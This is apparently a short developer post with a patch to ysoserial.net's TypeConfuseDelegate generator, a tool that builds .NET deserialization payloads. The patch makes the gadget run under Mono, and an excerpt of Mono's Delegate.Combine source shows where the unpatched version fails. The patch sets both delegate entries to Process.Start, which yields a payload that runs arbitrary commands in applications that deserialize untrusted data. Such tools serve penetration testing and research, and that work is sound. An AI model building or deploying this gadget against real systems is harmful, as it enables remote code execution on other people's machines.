Use Forshaw's TypeConfuseDelegate deserialization gadget with Mono - for ysoserial.net

TypeConfuseDelegate_mono.patch

diff --git a/ysoserial/Generators/TypeConfuseDelegateGenerator.cs b/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
index 96bbea0..0f83ffa 100755
--- a/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
@@ -46,6 +46,7 @@ namespace ysoserial.Generators
             FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
             object[] invoke_list = d.GetInvocationList();
             // Modify the invocation list to add Process::Start(string, string)
+            invoke_list[0] = new Func<string, string, Process>(Process.Start);
             invoke_list[1] = new Func<string, string, Process>(Process.Start);
             fi.SetValue(d, invoke_list);
 
@@ -53,4 +54,4 @@ namespace ysoserial.Generators
         }
 
     }
-}
\ No newline at end of file
+}

Delegate.c:548 in mcs/class/corlib/System/Delegate.cs is where the stock version errors out:

539                 public static Delegate Combine (Delegate a, Delegate b)
540                 {
541                         if (a == null)
542                                 return b;
543 
544                         if (b == null)
545                                 return a;
546 
547                         if (a.GetType () != b.GetType ())
548                                 throw new ArgumentException (string.Format ("Incompatible Delegate Types. First is {0} second is {1}.", a.GetType ().FullName, b.GetType ().FullName));
549 
550                         return a.CombineImpl (b);
551                 }